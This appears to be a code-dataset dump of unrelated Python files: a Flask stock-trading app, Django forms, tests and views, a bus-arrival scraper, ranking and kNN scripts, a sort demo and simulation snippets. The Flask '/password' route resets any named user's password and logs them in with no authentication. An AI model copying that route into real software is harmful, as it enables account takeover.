costmoneyTotal_2 = costmoneyTotal_2-sumItem4
# Test if can update total though shares
total = db.execute("SELECT sharesTotal FROM total WHERE userID = :userID and name = :name", userID=session["user_id"], name=name)
# Insert total TABLE
if not total:
db.execute("INSERT INTO total (name, symbol, price, sharesTotal, costmoneyTotal, userID) VALUES (:name, :symbol, :price, :sharesTotal, :costmoneyTotal, :userID)",
name=name, symbol=symbol, price=price, sharesTotal=sharesTotal_2, costmoneyTotal=costmoneyTotal_2, userID=session["user_id"])
# Update total TABLE
else:
db.execute("UPDATE total SET sharesTotal = :sharesTotal, costmoneyTotal = :costmoneyTotal WHERE userID = :userID and name = :name", sharesTotal=sharesTotal_2, costmoneyTotal=costmoneyTotal_2, userID=session["user_id"], name=name)
# SELECT all rows from total TABLE WHERE userID = session["user_id"]
total = db.execute("SELECT * FROM total WHERE userID = :userID", userID=session["user_id"])
# Len of total
tlen = len(total)
# Get user cash
cash = db.execute("SELECT cash FROM users WHERE id = :userID",
userID=session["user_id"])
cash = usd(cash[0]["cash"])
# Change price, costmoney to usd format
for n in range(tlen):
total[n]["price"] = usd(total[n]["price"])
total[n]["costmoneyTotal"] = usd(total[n]["costmoneyTotal"])
total = list(reversed(total))
# Flash
flash("buy")
return render_template("buyed.html", total=total, tlen=tlen, cash=cash)
else:
# Else cash not enough
return apology("cash not enough", 400)
else:
# Else not positive number
return apology("not positive number", 400)
@app.route("/check", methods=["GET"])
def check():
"""Return true if username available, else false, in JSON format"""
# Check length of request.form.get("username")
if not request.args.get("username"):
return jsonify(False)
# Query database for username
rows = db.execute("SELECT * FROM users WHERE username = :username",
username=request.args.get("username"))
# Ensure username not exists
if not rows:
return jsonify(True)
else:
return jsonify(False)
@app.route("/history")
@login_required
def history():
"""Show history of transactions"""
# User reached route via GET (as by clicking a link or via redirect)
if request.method == "GET":
# Select to buy-sell table
bs = db.execute("SELECT * FROM bs WHERE userID=:userID", userID=session["user_id"])
# len of buy sell table
bslen = len(bs)
# Falsh massage
flash('history')
# Rander buy sell and total return value list
return render_template("history.html", bs=bs, bslen=bslen)
@app.route("/password", methods=["GET", "POST"])
def password():
"""Log user in"""
# Forget any user_id
session.clear()
# User reached route via POST (as by submitting a form via POST)
if request.method == "POST":
# Ensure username was submitted
if not request.form.get("username"):
return apology("must provide username1", 403)
# Ensure password was submitted
elif not request.form.get("password"):
return apology("must provide password", 403)
# Ensure password was confirmated
elif request.form.get("password") != request.form.get("confirmation"):
return apology("must provide confirmation password", 403)
# Query database for username
rows = db.execute("SELECT * FROM users WHERE username = :username",
username=request.form.get("username"))
# Ensure username exists and password is correct
if len(rows) != 1:
return apology("invalid username", 403)
else:
# Get password from form
password = request.form.get("password")
# Hash password through Hash function
hash0 = generate_password_hash(password)
# Change database
db.execute("UPDATE users SET hash = :hash1 WHERE username = :username", hash1=hash0, username=request.form.get("username"))
# Remember which user has logged in
session["user_id"] = rows[0]["id"]
# Falsh massage
flash('password change')
# Redirect user to home page
return redirect("/")
# User reached route via GET (as by clicking a link or via redirect)
else:
return render_template("password.html")
@app.route("/login", methods=["GET", "POST"])
def login():
"""Log user in"""
# Forget any user_id
session.clear()
# User reached route via POST (as by submitting a form via POST)
if request.method == "POST":
# Ensure username was submitted
if not request.form.get("username"):
return apology("must provide username1", 403)
# Ensure password was submitted
elif not request.form.get("password"):
return apology("must provide password", 403)
# Query database for username
rows = db.execute("SELECT * FROM users WHERE username = :username",
username=request.form.get("username"))
# Ensure username exists and password is correct
if len(rows) != 1 or not check_password_hash(rows[0]["hash"], request.form.get("password")):
return apology("invalid username and/or password", 403)
# Remember which user has logged in
session["user_id"] = rows[0]["id"]
# Falsh massage
flash('login')
# Redirect user to home page
return redirect("/")
# User reached route via GET (as by clicking a link or via redirect)
else:
return render_template("login.html")
@app.route("/logout")
def logout():
"""Log user out"""
# Forget any user_id
session.clear()
# Falsh massage
flash('logout')
# Redirect user to login form
return redirect("/")
@app.route("/quote", methods=["GET", "POST"])
@login_required
def quote():
"""Get stock quote."""
# User reached route via GET (as by submitting a form via GET)
if request.method == "GET":
return render_template("quote.html")
else:
# Ensure symbol was submitted
if not request.form.get("symbol"):
return apology("must provide symbol", 400)
# Get symbol
symbol = request.form.get("symbol")
# Check symbol
symbol= lookup(symbol)
# Ensure symbol is exist
if not symbol:
return apology("must provide right symbol", 400)
return render_template("quoted.html",name=symbol.get("name"), symbol=symbol.get("symbol"), price=usd(symbol.get("price")))
@app.route("/register", methods=["GET", "POST"])
def register():
"""Register user"""
# User reached route via POST (as by submitting a form via POST)
if request.method == "POST":
# Ensure username was submitted
if not request.form.get("username"):
return apology("must provide username", 400)
# Ensure password was submitted
elif not request.form.get("password") :
return apology("must provide password", 400)
# Ensure password was confirmated
elif request.form.get("password") != request.form.get("confirmation"):
return apology("must provide same password", 400)
# Get password from form
password = request.form.get("password")
# Hash password through Hash function
hash0 = generate_password_hash(password)
# Query database for username
rows = db.execute("SELECT * FROM users WHERE username = :username",
username=request.form.get("username"))
# Ensure username not exists
if not rows:
db.execute("INSERT INTO users (username,hash) VALUES (:username,:hash1)",
username=request.form.get("username"), hash1 = hash0 )
else:
return apology("username can't be the same", 400)
# Query database again for username
rows_2 = db.execute("SELECT * FROM users WHERE username = :username",
username=request.form.get("username"))
# Remember which user has logged in
session["user_id"] = rows_2[0]["id"]
# Falsh massage
flash('register!')
# Redirect user to home page
return redirect("/")
# User reached route via GET (as by clicking a link or via redirect)
else:
return render_template("register.html")
@app.route("/sell", methods=["GET", "POST"])
@login_required
def sell():
"""Sell shares of stock"""
# User reached route via GET (as by submitting a form via GET)
if request.method == "GET":
# Select user symbol from total
symbol_sel = db.execute("SELECT symbol FROM total WHERE userID = :userID", userID=session["user_id"])
return render_template("sell.html", symbol_sel=symbol_sel, sslen=len(symbol_sel) )
else:
# Get symbol and number through input form
symbol = request.form.get("symbol")
number = request.form.get("shares")
# Ensure sell symbol was submitted
if not symbol:
return apology("must provide symbol", 400)
# Ensure sell number was submitted
if not number:
return apology("must provide number", 400)
# Check if request.form.get("symbol") in lookup() table
symbol = lookup(symbol)
if not symbol:
return apology("must provide right symbol", 400)
else:
# Get name, price, symbol from lookup function
name = symbol.get("name")
price = symbol.get("price")
symbol = symbol.get("symbol")
# SELECT symbol in TABLE total
symbolIn = db.execute("SELECT symbol FROM total WHERE userID = :userID and symbol = :symbol",
userID=session["user_id"], symbol=symbol)
# Ensure user have this symbol
if not symbolIn:
return apology("you don't have this symbol", 400)
# Ensure sell number is a number
nlen = len(number)
for i in range(nlen) :
if number[i].isdigit() != True :
return apology("sell number need to be a number", 400)
number = int(number)
# Check positive number
if number > 0:
# SELECT sharesTotal in TABLE total
symbolNum = db.execute("SELECT sharesTotal FROM total WHERE userID = :userID and symbol = :symbol",
userID=session["user_id"], symbol=symbol)
# Ensure user have sharesTotal
if symbolNum[0]["sharesTotal"] < number:
return apology("you don't have this number", 400)
# Selsct cash from user TABLE
cash = db.execute("SELECT cash FROM users WHERE id = :userID",
userID=session["user_id"])
# Count total
totalGet = price*number
cash = cash[0]["cash"] + totalGet
# Update csah in user
db.execute("UPDATE users SET cash = :cash WHERE id = :userID", cash=cash, userID=session["user_id"])
# Check sell time
now = datetime.now(timezone('Asia/Shanghai'))
# INSERT sell TABLE date, shares, price, name, symbol, totalGet
db.execute("INSERT INTO sell (date, symbol, name, price, shares, totalGet, userID) VALUES (:date, :symbol, :name, :price, :shares, :totalGet, :userID)",date=now, symbol=symbol, name=name, price=price, shares=number, totalGet=totalGet, userID=session["user_id"])
# Add to buy-sell table
db.execute("INSERT INTO bs (symbol, price, shares, date, userID) VALUES (:symbol, :price, :shares, :date, :userID)", symbol=symbol, price=usd(price), shares=-number, date=now, userID=session["user_id"])
# SELECT costmoneyTotal FROM total
costTot = db.execute("SELECT costmoneyTotal FROM total WHERE userID = :userID and name = :name",
userID=session["user_id"], name = name)
# Change costmoneyTotal FROM total
costTotEnd = costTot[0]["costmoneyTotal"]-totalGet
# Update sharesTotal, costmoneyTotal total did by order
db.execute("UPDATE total SET sharesTotal = :sharesTotal, costmoneyTotal = :costmoneyTotal WHERE userID = :userID and name = :name", sharesTotal=symbolNum[0]["sharesTotal"]-number, costmoneyTotal=costTotEnd, userID=session["user_id"], name=name)
# Falsh massage
flash('sell')
# render selled template
return render_template("selled.html",symbol=symbol, name=name, price=price, number=symbolNum[0]["sharesTotal"]-number, totalGet=usd(totalGet), costTotEnd=usd(cash))
else:
return apology("positive number", 400)
def errorhandler(e):
"""Handle error"""
if not isinstance(e, HTTPException):
e = InternalServerError()
return apology(e.name, e.code)
# Listen for errors
for code in default_exceptions:
app.errorhandler(code)(errorhandler)
|
12,486 | 271812b8726ba3ec4d0b262bf91946fe6c20c9c1 | # -*- coding: utf-8 -*-
"""
Created on Mon Nov 6 18:42:31 2017
@author: Ryan Lott
Game rules:
Objective: Connect both keyboard sides with a single word
All letters in the word must form a single chain
"""
import time
import os
from graph_func import Graph
# Start timer
start_time = time.time()
# Grab data
a = os.getcwd()
a= open(a+'\\words.txt','r').read()
words = a.lower().split("\n")
# Graph of possible connections
graph = { "a" : ["q",'w','s','z'],
"b" : ["v", "g",'h','n'],
"c" : ["x", "d", "f", "v"],
"d" : ["s", "e", "r", "f",'c','x'],
"e" : ["w", "s", "d", "r"],
"f" : ["d", "r", "t", "g",'v','c'],
"g" : ["f", "t", "y", "h",'b','v'],
"h" : ["g", "y", "u", "j",'n','b'],
"i" : ["u", "j", "k", "o"],
"j" : ["h", "u", "i", "k",'m','n'],
"k" : ["j", "i", "o", "l",'m'],
"l" : ["k", "o", "p"],
"m" : ["n", "j", "k"],
"n" : ["b", "h", "j", "m"],
"o" : ["i", "k", "l", "p"],
"p" : ["o", "l"],
"q" : ["w", "a"],
"r" : ["e", "d", "f", "t"],
"s" : ["a", "w", "e", "d",'x','z'],
"t" : ["r", "f", "g", "y"],
"u" : ["y", "h", "j", "i"],
"v" : ["c", "f", "g", "b"],
"w" : ["q", "a", "s", "e"],
"x" : ["z", "s", "d", "c"],
"y" : ["t", "g", "h", "u"],
"z" : ["a", "s", "x"] }
# Stores all words that cross the keyboard for outputing
successes = []
# Define edge connections that would infer success
attempts = ['qp','ap','zp','ql','al','zl','qm','am','zm']
# Loop all words in 466k words in dictionary and test against parameters
for word in words:
if len(word) > 6: # Impossible to cross in 6, fastest method to eliminate
# Limit graph to only have access to connections for letters in word
dicts = {}
letters = [letter for letter in word]
for letter in letters:
# Try/Except to handle special characters
try:
matches = [match for match in graph[letter] if match in letters]
dicts[letter] = matches
except: pass
if not any(dicts[key] == [] for key in dicts.keys()): # Error handling
# Create graph
g = Graph(dicts)
links = []
for key in dicts.keys():
for key1 in dicts.keys():
links.append([key,key1])
# Test for a single contiguous chain of letters
if not any(str(g.find_path(link[0],link[1]))=="None" for link in links):
# Test if letter combination that crosses the keyboard exists
for attempt in attempts:
if g.find_path(attempt[0],attempt[1]):
print(attempt," success: ", word)
successes.append(word+": "+attempt)
# Takes roughly 6.5s
end_time = time.time() - start_time
print("Time to complete: ",end_time) |
12,487 | 0ca56fdc2734c15b965708c268c1af9d86e4a6f5 | import re
from django.contrib.auth.models import User
from django.forms import ValidationError
from nose.tools import eq_
from pyquery import PyQuery as pq
from users.forms import (RegisterForm, EmailConfirmationForm, EmailChangeForm,
PasswordChangeForm, PasswordConfirmationForm)
from users.tests import TestCaseBase
class RegisterFormTestCase(TestCaseBase):
pass #TODO
class EmailConfirmationFormTestCase(TestCaseBase):
fixtures = ['users.json']
def setUp(self):
self.user = User.objects.get(username='rrosario')
def test_correct_email(self):
form = EmailConfirmationForm(self.user, data={'email': 'user118577@nowhere.com'})
assert form.is_valid()
def test_invalid_email_address(self):
form = EmailConfirmationForm(self.user, data={'email': 'invalid@.email'})
assert not form.is_valid()
class EmailChangeFormTestCase(TestCaseBase):
fixtures = ['users.json']
def setUp(self):
self.user = User.objects.get(username='rrosario')
def test_wrong_password(self):
form = EmailChangeForm(self.user, data={'password': 'wrongpass',
'new_email': 'new_email@example.com'})
assert not form.is_valid()
def test_invalid_email_address(self):
form = EmailChangeForm(self.user, data={'password': 'testpass',
'new_email': 'invalid@.email'})
assert not form.is_valid()
class PasswordChangeFormTestCase(TestCaseBase):
fixtures = ['users.json']
def setUp(self):
self.user = User.objects.get(username='rrosario')
def test_wrong_password(self):
form = PasswordChangeForm(self.user, data={'password': 'wrongpass',
'new_password': 'newpassword',
'new_password2': 'newpassword'})
assert not form.is_valid()
def test_passwords_not_matching(self):
form = PasswordChangeForm(self.user, data={'password': 'testpass',
'new_password': 'firstpass',
'new_password2': 'secondpass'})
assert not form.is_valid()
def test_valid_input(self):
form = PasswordChangeForm(self.user, data={'password': 'testpass',
'new_password': 'newpass',
'new_password2': 'newpass'})
assert form.is_valid()
class PasswordConfirmationFormTestCase(TestCaseBase):
fixtures = ['users.json']
def setUp(self):
self.user = User.objects.get(username='rrosario')
def test_wrong_password(self):
form = PasswordConfirmationForm(self.user, data={'password': 'wrongpass'})
assert not form.is_valid()
def test_correct_password(self):
form = PasswordConfirmationForm(self.user, data={'password': 'testpass'})
assert form.is_valid()
|
12,488 | d9d18d0802b699d81635236c227e8e356342abdf | import requests, bs4, time, csv
#### setup variables
f_writeout = 1 #binary flag to enable logging to local CSV file
sb_url = 'https://buseta.wmata.com/m/index?q=1003237' #test url, ft totten station bus stop
nb_url = 'https://buseta.wmata.com/m/index?q=2001159' #test url, twinbrook station bus stop
#sb_url = 'https://buseta.wmata.com/m/index?q=3002518' #url for laurel-bowie & montpelier south-bound route 87 bus stop
#nb_url = 'https://buseta.wmata.com/m/index?q=3002573' #url for greenbelt metro north-bound route 87 bus stop
distances = ['approaching', 'at stop'] #bus distance statuses to capture, i.e., don't log "2.3 miles" statuses
max_time = 3 #time in minutes away from stop under which to start logging presence
route_names = ['E4 WEST to FRIENDSHIP HEIGHTS', 'C4 EAST to PRINCE GEORGES PLAZA STATION'] #test routes to capture on bus stop pages
#route_names = ['Route 87 - SOUTH to GREENBELT STATION', 'Route 87 - NORTH to LAUREL']
####################
temp = []
results = []
nb_pagedata = requests.get(nb_url)
sb_pagedata = requests.get(sb_url)
current_date = time.strftime('%x')
current_time = time.strftime('%X')
nb_cleanpagedata = bs4.BeautifulSoup(nb_pagedata.text, 'html.parser')
sb_cleanpagedata = bs4.BeautifulSoup(sb_pagedata.text, 'html.parser')
nb_arrivals = nb_cleanpagedata.find_all(class_='arrivalsAtStop')
sb_arrivals = sb_cleanpagedata.find_all(class_='arrivalsAtStop')
for arrival in nb_arrivals:
temp.append([list(arrival.parent.strings)[0].strip(', ').replace('\xa0', ' ')] + [x.strip(', ').replace('\xa0', ' ') for x in arrival.strings])
for arrival in sb_arrivals:
temp.append([list(arrival.parent.strings)[0].strip(', ').replace('\xa0', ' ')] + [x.strip(', ').replace('\xa0', ' ') for x in arrival.strings])
for arrival in temp:
if (float(arrival[1].split(' ')[0]) < max_time or arrival[2] in distances) and arrival[0] in route_names:
results.append([current_date, current_time, arrival[0], arrival[1], arrival[2], arrival[3]])
if f_writeout:
if results:
with open(r'bus_log.csv', 'a') as f:
logger = csv.writer(f)
logger.writerows(results)
f.close()
else:
print(results)
|
12,489 | d87f02630744a787d0a0b53ba58359a57564db80 | from django.contrib import admin
from .models import School, Grade, Student, Mentor, Student_Group_Mentor_Assignment, Session_Schedule, Attendance, User, remark
# Register your models here.
class UserList(admin.ModelAdmin):
list_display = ('email','username','is_active','created_on','role','is_staff','is_mentor')
list_filter = ('email','username','is_active','created_on','role','is_staff','is_mentor')
search_fields = ('email','username','is_active','created_on','role','is_staff','is_mentor')
ordering = ['email']
class SchoolList(admin.ModelAdmin):
list_display = ('school_name', 'school_email', 'school_phone')
list_filter = ('school_name', 'school_email')
search_fields = ('school_name',)
ordering = ['school_name']
class GradeList(admin.ModelAdmin):
list_display = ['grade_num']
list_filter = ['grade_num']
search_fields = ['grade_num']
ordering = ['grade_num']
class StudentList(admin.ModelAdmin):
list_display = ('student_first_name', 'student_middle_name', 'student_last_name', 'school', 'grade')
list_filter = ('student_first_name', 'student_last_name', 'school', 'grade')
search_fields = ('student_first_name', 'student_last_name', 'school', 'grade')
ordering = ['student_first_name']
class MentorList(admin.ModelAdmin):
list_display = ('mentor_first_name', 'mentor_middle_name', 'mentor_last_name', 'mentor_email', 'mentor_phone')
list_filter = ('mentor_first_name', 'mentor_middle_name', 'mentor_last_name', 'mentor_email', 'mentor_phone')
search_fields = ('mentor_first_name', 'mentor_middle_name', 'mentor_last_name', 'mentor_email', 'mentor_phone')
ordering = ['mentor_first_name']
class GroupMentorAssignmentList(admin.ModelAdmin):
list_display = ('group_name', 'school', 'grade', 'mentor')
list_filter = ('group_name', 'school', 'grade', 'mentor')
search_fields = ('group_name', 'school', 'grade', 'mentor')
ordering = ['group_name']
class SessionScheduleList(admin.ModelAdmin):
list_display = ('session_name', 'session_location', 'mentor', 'group', 'session_start_date', 'session_end_date')
list_filter = ('session_name', 'session_location', 'mentor', 'group', 'session_start_date', 'session_end_date')
search_fields = ('session_name', 'session_location', 'mentor', 'group', 'session_start_date', 'session_end_date')
ordering = ['session_name']
class remarkList(admin.ModelAdmin):
list_display = ('remark_notes','remark_student_id', 'remark_mentor_id')
class AttendanceList(admin.ModelAdmin):
list_display = (
'attendance_student_id', 'attendance_grade_id', 'attendance_mentor_id', 'attendance_session_ID',
'attendance_ID')
list_filter = (
'attendance_student_id', 'attendance_grade_id', 'attendance_mentor_id', 'attendance_session_ID',
'attendance_ID')
search_fields = (
'attendance_student_id', 'attendance_grade_id', 'attendance_mentor_id', 'attendance_session_ID',
'attendance_ID')
ordering = ['attendance_session_ID']
admin.site.register(User,UserList)
admin.site.register(School, SchoolList)
admin.site.register(Grade, GradeList)
admin.site.register(Student, StudentList)
admin.site.register(Mentor, MentorList)
admin.site.register(Student_Group_Mentor_Assignment, GroupMentorAssignmentList)
admin.site.register(Session_Schedule, SessionScheduleList)
admin.site.register(Attendance, AttendanceList)
admin.site.register(remark,remarkList)
|
12,490 | 67e9c7f95207bf57e992731381853218815a07b4 | import numpy as np
import pandas as pd
import pyterrier as pt
import xgboost as xgb
import time
if not pt.started():
pt.init(mem=20000)
dataset = pt.get_dataset("trec-deep-learning-docs")
def msmarco_generate():
with pt.io.autoopen('msmarco-docs.tsv.gz', 'rt') as corpusfile:
for l in corpusfile:
docid, url, title, body = l.split("\t")
yield {'docno' : docid, 'url' : url, 'title' : title, 'text' : body}
props = {
'indexer.meta.reverse.keys':'docno',
'termpipelines' : '',
}
indexer = pt.IterDictIndexer("./document_index", blocks=True, verbose=True)
indexer.setProperties(**props)
indexref = indexer.index(msmarco_generate(), fields=['docno', 'text'], meta=['docno', 'text'], meta_lengths=[20, 4096])
index = pt.IndexFactory.of(indexref)
print(index.getCollectionStatistics().toString())
fbr = pt.FeaturesBatchRetrieve(index,
properties={"termpipelines": ""},
controls = {"wmodel": "DirichletLM"},
verbose=True,
features=["WMODEL:Tf", "WMODEL:PL2", "WMODEL:BM25", "WMODEL:DPH", "WMODEL:TF_IDF", "SAMPLE"]) % 100
params = {'objective': 'rank:ndcg',
'learning_rate': 0.1,
'gamma': 1.0, 'min_child_weight': 0.1,
'max_depth': 6,
'verbose': 2,
'random_state': 42
}
BaseLTR_LM = fbr >> pt.pipelines.XGBoostLTR_pipeline(xgb.sklearn.XGBRanker(**params))
train_start_time = time.time()
BaseLTR_LM.fit(pt.io.read_topics("sample_train_20000.txt", format="singleline"), dataset.get_qrels("train"), dataset.get_topics("dev"), dataset.get_qrels("dev"))
train_end_time = time.time()
print("Train time:", train_end_time-train_start_time)
test_start_time = time.time()
allresultsLM = pt.pipelines.Experiment([BaseLTR_LM],
dataset.get_topics("test"),
dataset.get_qrels("test"), ["recip_rank", "ndcg_cut_10","map"],
names=["LambdaMART"])
test_end_time = time.time()
print("Test time:", test_end_time-test_start_time)
print(allresultsLM)
# Reference:
# [1] Craig Macdonald and Nicola Tonellotto. 2020. Declarative Experimentation inInformation Retrieval using PyTerrier. InProceedings of ICTIR 2020.
|
12,491 | 5c157bbff4bc4049751d537704482489b440b6c9 | from numpy import *
from os import listdir
import operator
#将32x32的二进制图像矩阵转换为1x1024的向量
def imgVector(filename):
returnVect = zeros((1, 1024))
f = open(filename)
for i in range(32):
listStr = f.readline()
for j in range(32):
returnVect[0, 32*i+j] = int(listStr[j])
return returnVect
def classify(inX, dataSet, labels, k):
dataSetSize = dataSet.shape[0]
diffMat = tile(inX, (dataSetSize, 1)) - dataSet
sqDiffMat = diffMat**2
sqDistances = sqDiffMat.sum(axis=1)
distances = sqDistances**0.5
sortedDistIndicies = distances.argsort()
classCount = {}
for i in range(k):
voteIlabel = labels[sortedDistIndicies[i]]
classCount[voteIlabel] = classCount.get(voteIlabel,0) + 1
sortClassCount = sorted(classCount.items(), key=operator.itemgetter(1), reverse=True)
return sortClassCount[0][0]
def handwritingClassTest():
hwlabels = []
#返回指定路径下的文件和文件夹列表。
trainingFileList = listdir('trainingDigits')
m = len(trainingFileList)
trainingMat = zeros((m,1024))
#将trainingDigits中的二进制图像转换为1x1024的向量,并根据文件名将对应的数字保存到hwlabels中
for i in range(m):
fileNameStr = trainingFileList[i]
fileStr = fileNameStr.split('.')[0]
labelNum = int(fileStr.split('_')[0])
hwlabels.append(labelNum)
trainingMat[i, :] = imgVector('trainingDigits\%s'%fileNameStr)
testFileList = listdir('testDigits')
errorCount = 0.0
mTest = len(testFileList)
for j in range(mTest):
fileNameStr = testFileList[j]
fileStr = fileNameStr.split('.')[0]
labelNum = int(fileStr.split('_')[0])
testVector = imgVector('testDigits\%s'%fileNameStr)
classifiyResult = classify(testVector, trainingMat, hwlabels, 3)
#print('识别结果为:%d, 真实结果为:%d'%(classifiyResult,labelNum))
if int(classifiyResult) != labelNum:
errorCount = errorCount + 1.0
#print('识别结果为:%d, 真实结果为:%d'%(classifiyResult,labelNum))
print('一共错了:%f个'%errorCount)
rightRatio = 1 - (errorCount/float(mTest))
print('正确率为:%f %%'%(rightRatio*100))
handwritingClassTest()
|
12,492 | 82aefcd8bcf5fd8d7ba82ab6afd267c405b14cbc | import copy
import random
from presenter import SortPresenter
SIZE = 10
PAUSE_SEC = 0.3
IS_DISPLAY = True
def _swap(lst, i, t):
v = lst[i]
lst[i] = lst[t]
lst[t] = v
return lst
def comb_sort(l, is_display=True):
interval = int(SIZE // 1.3)
counter = 0
is_swapped = True
if is_display:
presenter = SortPresenter(SIZE)
while not (interval == 1 and not is_swapped):
is_swapped = False
for i in range(SIZE - interval):
counter += 1
target = i + interval
if is_display:
before = copy.deepcopy(l)
if l[i] > l[target]:
l = _swap(l, i, target)
is_swapped = True
if is_display:
presenter.show_compare_and_swap(
index=i,
target=target,
before_list=before,
after_list=l,
pause_sec=PAUSE_SEC,
)
if interval > 1:
interval = int(interval // 1.3)
print(counter)
if __name__ == '__main__':
lst = [e + 1 for e in range(SIZE)]
random.shuffle(lst)
comb_sort(lst, is_display=IS_DISPLAY)
|
12,493 | c816ab40acf2fd355fac3f90ec573e5942b3a1da | from django.core.mail import EmailMultiAlternatives, BadHeaderError
from django.conf import settings
from django.db import transaction
from django.http import HttpResponse
from django.shortcuts import redirect
from django.template import loader
from django.utils.html import strip_tags
from django.views.generic import TemplateView
from django_classified.views import ItemDetailView
from django_classified.models import Item
from yardsale.forms import ContactForm
from yardsale.models import Reservation
class ItemDetailView(ItemDetailView):
model = Item
queryset = Item.active
def get_context_data(self, **kwargs):
form = ContactForm()
instance = self.get_object()
context = super().get_context_data(**kwargs)
message = 'Hello, i would like to buy an item: {}, id: {}'.format(
instance.title,
instance.id,
)
form.fields['message'].initial = message
context['form'] = form
return context
def post(self, request, *args, **kwargs):
form = ContactForm(request.POST)
instance = self.get_object()
if form.is_valid():
from_email = form.cleaned_data['from_email']
subject = form.cleaned_data['subject']
to_email = instance.user.email
with transaction.atomic():
Reservation.objects.create(
email=from_email,
item=instance,
state='NEW'
)
instance.is_active = False
instance.save()
html_content = loader.render_to_string(
'emails/reservation.html',
{
'request': request,
'item': instance,
'message': form.cleaned_data['message']
},
request
)
try:
mail = EmailMultiAlternatives(
subject=subject,
body=strip_tags(html_content),
from_email=settings.EMAIL_FROM,
to=[
from_email
],
cc=[
to_email,
settings.ADMIN_EMAIL,
settings.ACCOUNTANT_EMAIL
],
reply_to=[from_email],
)
mail.attach_alternative(html_content, 'text/html')
mail.send()
except BadHeaderError:
return HttpResponse('Invalid header found.')
return redirect('reserved')
class ReservationOutcomeView(TemplateView):
template_name = 'reservation_outcome.html'
|
12,494 | fdd8c4eefe663cb5052eb4bdb6fd41951b30cf99 | import sys
import pandas as pd
filename = "survey_results_public.csv"
if len(sys.argv) == 2:
filename = sys.argv[1]
country_name = 'Israel'
chunks = []
dev_chunks=[]
for chunk in pd.read_csv(filename, usecols=['Country','DevType'],chunksize=10000):
part = chunk[chunk['Country'] == country_name]
#df = pd.read_csv(filename, usecols=['Country','DevType'])
#,chunksize=10000):
#for chunk in pd.read_csv(filename, usecols=['Country','DevType'],chunksize=10000):
# part = chunk[chunk['Country'] == country_name]
#
#
# print(chunk.size)
# print(part.size)
# print('--')
chunks.append(part)
#
#
df = pd.concat(chunks)
print(df.dtypes)
for value in ['Academic researcher','Data or business analyst', 'Data scientist or machine learning specialist','Database administrator','Designer', 'Developer, back-end',
'Developer, desktop or enterprise applications','Developer, embedded applications or devices','Developer, front-end','Developer, full-stack','Developer, game or graphics', 'Developer, mobile','Developer, QA or test',
'DevOps specialist','Educator','Engineer, data', 'Engineer, site reliability','Engineering manager', 'Marketing or sales professional', 'Product manager', 'Scientist',
'Senior Executive (C-Suite, VP, etc.)', 'System administrator']:
#for value in ['Academic researcher','Data or business analyst', 'Designer']:
print(value)
#df[value]= df.apply(lambda row: 1, axis=1)
#df[value]= df.apply(lambda row: value in str(row['DevType']), axis=1)
df[value]= df.apply(lambda row: pd.notnull(row['DevType']) and value in row['DevType'], axis=1)
print(df.count())
print(df.size)
print(df)
|
12,495 | be2e25175a6324997c6fa62e9906dccd5fb6674d | # -*- coding: mbcs -*-
#
# Abaqus/CAE Release 2017 replay file
# Internal Version: 2016_09_28-05.54.59 126836
# Run by WangDoo on Sun Aug 18 15:49:14 2019
#
# from driverUtils import executeOnCaeGraphicsStartup
# executeOnCaeGraphicsStartup()
#: Executing "onCaeGraphicsStartup()" in the site directory ...
from abaqus import *
from abaqusConstants import *
session.Viewport(name='Viewport: 1', origin=(0.0, 0.0), width=238.520309448242,
height=73.5212936401367)
session.viewports['Viewport: 1'].makeCurrent()
session.viewports['Viewport: 1'].maximize()
from caeModules import *
from driverUtils import executeOnCaeStartup
executeOnCaeStartup()
openMdb('test-write.cae')
#: The model database "D:\Coding\Github\Fortarn\Abaqus\USDFLD\cae\test-write.cae" has been opened.
session.viewports['Viewport: 1'].setValues(displayedObject=None)
session.viewports['Viewport: 1'].partDisplay.geometryOptions.setValues(
referenceRepresentation=ON)
p = mdb.models['Model-1'].parts['Part-1']
session.viewports['Viewport: 1'].setValues(displayedObject=p)
a = mdb.models['Model-1'].rootAssembly
session.viewports['Viewport: 1'].setValues(displayedObject=a)
session.viewports['Viewport: 1'].assemblyDisplay.setValues(loads=ON, bcs=ON,
predefinedFields=ON, connectors=ON, optimizationTasks=OFF,
geometricRestrictions=OFF, stopConditions=OFF)
|
12,496 | 6ace18bec836752e71475c542e0d95f728fe5e1d | from peewee import DoesNotExist
from playhouse.shortcuts import model_to_dict
from main.models.person import Person
from ron.web import Controller
from ron import request, response
class API(Controller):
# sets a base route for this controller
base_route = '/api'
@Controller.route('/', method='GET')
def index(self):
"""
Just returns the "index" text on the base api url
"""
return dict(data='index')
@Controller.route('/person', method='GET')
def get_persons(self):
"""
Get all Persons
"""
result = Person.select().dicts()
return dict(name='Person', data=list(result))
@Controller.route('/person', method='POST')
def add_person(self):
"""
Insert a new Person
"""
data = dict(request.forms)
pp = Person(**data)
if pp.validate():
pp.save()
data = model_to_dict(pp)
else:
data = pp.validator().errors
return dict(name='Person', data=data)
@Controller.route('/person/<id:int>', method='GET')
def get_person(self, id):
"""
Return a person by id
"""
try:
person = Person.get(Person.id == id)
data = model_to_dict(person)
except DoesNotExist:
response.status = 404
data = "Not found"
return dict(name='Person', data=data)
@Controller.route('/person/<id:int>', method='PUT')
def update_person(self, id):
"""
Update a Person
"""
person = Person.get(Person.id == id)
form_data = dict(request.forms)
if person.validate(form_data):
person.update_model(form_data)
person.save()
data = model_to_dict(person)
else:
data = person.validator().errors
return dict(name='Person', data=data)
@Controller.route('/person/<id:int>', method='DELETE')
def delete_person(self, id):
"""
Delete a person
"""
data = Person.delete().where(Person.id == id).execute()
return dict(name='Person', data=data)
|
12,497 | 9f8ad9c4bdb0e7739014c42223ce4e629b4ed2be | #!/usr/bin/env python
import argparse
import ROOT
import parametersweep as ps
import glob
import os
import sys
import numpy as np
import subprocess as sp
import utilities as ut
import visualize
ROOT.gROOT.SetBatch(ROOT.kTRUE)
'''Performs the analysis of conductance-based model. Unlike the lifanalysis.py and qifanalysis.py script, it assumes that the matrix files for these experiments already
have been generated. It is assumed that all model and matrix files have been provided with this script and that they reside in this director.
Run the check_setup_routine to find out if this is the case.'''
MODELS={}
MATRICES={}
MODELS['standard']='condee2a5ff4-0087-4d69-bae3-c0a223d03693.model'
MATRICES[MODELS['standard']]=['condee2a5ff4-0087-4d69-bae3-c0a223d03693_0_0.05_0_0_.mat', 'condee2a5ff4-0087-4d69-bae3-c0a223d03693_0_0.1_0_0_.mat']
MODELS['clipped']='cond7bc12c35-9d87-43fc-8ccc-9223c2714440.model'
